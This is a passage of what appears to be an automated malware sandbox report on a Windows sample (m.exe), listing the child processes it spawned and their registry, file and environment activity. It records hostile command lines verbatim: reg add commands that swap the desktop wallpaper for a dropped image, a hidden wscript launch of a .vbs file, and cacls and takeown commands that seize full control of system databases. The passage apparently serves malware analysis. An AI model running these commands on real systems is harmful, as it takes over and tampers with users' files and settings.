| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "qmgr.db" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "qmgr.db" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #13: reg.exe
38
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\FD1HVy\AppData\Roaming\GJhtEkh2.bmp" /f |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:55, Reason: Child Process |
| Unmonitor | End Time: 00:01:58, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11d4 |
| Parent PID | 0x10fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
11D8
0x
11F8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00350000 | 0x003A1FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper, data = C:\Users\FD1HVy\AppData\Roaming\GJhtEkh2.bmp, size = 90, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x350000 |
|
1 |
Process #14: wscript.exe
33
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | wscript //B //Nologo "C:\Users\FD1HVy\AppData\Roaming\eapzhiWZ.vbs" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:55, Reason: Child Process |
| Unmonitor | End Time: 00:03:57, Reason: Self Terminated |
| Monitor Duration | 00:02:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11dc |
| Parent PID | 0x1104 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
11E0
0x
11F4
0x
1248
0x
1300
0x
1330
0x
1368
0x
10C4
0x
10C0
0x
EB8
0x
1B4
0x
548
0x
47C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| vbscript.dll | 0x742F0000 | 0x7436FFFF | Marked Writable | - | 32-bit | - |
|
|
|
| wscript.exe | 0x00A40000 | 0x00A66FFF | Forced | - | 32-bit | - |
|
|
|
| wscript.exe | 0x00A40000 | 0x00A66FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Wscript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = size |
|
1 | |
| Read | - | size = 261, size_out = 261 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings | value_name = AmsiEnable, data = 0, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | show_window = SW_HIDE |
|
1 | |
| Create | cmd.exe | show_window = SW_HIDE |
|
1 |
Module (11)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | amsi.dll | base_address = 0x74390000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76480000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0xa40000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\WINDOWS\SysWOW64\wscript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x74f71cd0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiInitialize, address_out = 0x74393dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiScanString, address_out = 0x74394170 |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0xa4ae50 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x765e4730 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiUninitialize, address_out = 0x74393fb0 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 186734 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 |
Process #15: reg.exe
38
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:01, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1200 |
| Parent PID | 0x10fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1204
0x
1228
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00350000 | 0x003A1FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x350000 |
|
1 |
Process #16: cmd.exe
367
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:01:38 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1208 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
120C
0x
1240
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (285)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
139 | |
| Open | STD_INPUT_HANDLE | - |
|
15 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 48, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1264, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x12e0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1244, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "SmsInterceptStore.db" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "SmsInterceptStore.db" |
|
1 |
Process #18: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:03, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1234 |
| Parent PID | 0x1194 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1238
0x
1244
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #19: reg.exe
38
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:03, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1250 |
| Parent PID | 0x10fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1254
0x
1258
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00350000 | 0x003A1FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x350000 |
|
1 |
Process #20: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:04, Reason: Child Process |
| Unmonitor | End Time: 00:02:05, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1264 |
| Parent PID | 0x1208 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1268
0x
1270
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #21: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x12e0 |
| Parent PID | 0x1208 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12E4
0x
12F8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #22: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x12e8 |
| Parent PID | 0x1194 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12EC
0x
12F4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #23: cmd.exe
367
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:10, Reason: Child Process |
| Unmonitor | End Time: 00:02:45, Reason: Self Terminated |
| Monitor Duration | 00:00:35 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1304 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1308
0x
1354
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (285)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
139 | |
| Open | STD_INPUT_HANDLE | - |
|
15 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 118 |
|
